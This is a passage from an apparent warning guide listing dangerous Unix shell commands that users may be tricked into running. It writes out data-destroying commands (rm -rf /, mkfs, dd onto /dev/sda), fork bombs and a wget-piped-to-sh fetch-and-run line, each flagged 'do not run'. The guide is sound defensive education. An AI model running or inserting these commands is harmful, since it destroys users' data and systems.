HTML clipboard Again, DANGEROUS COMMANDS — look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn’t “feel right”.

Delete all files, delete current directory, and delete visible files in current directory. It’s quite obvious why these commands can be dangerous to execute.

rm -rf /
rm -rf .
rm -rf *

Another interesting one comes up when trying to delete all hidden entries in a directory (hidden entries start with a “.”) You may be tempted to use:

rm -r .*

The only problem is that .., the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative that I can think of for this would be

rm -r .[^.]*

which will exclude the entry “..”. Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)

:(){:|:&};:

In Perl

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of GB’s, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses — benign or malevolent. Do not execute code from people you don’t trust

wget http://some_place/some_file
sh ./some_file

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the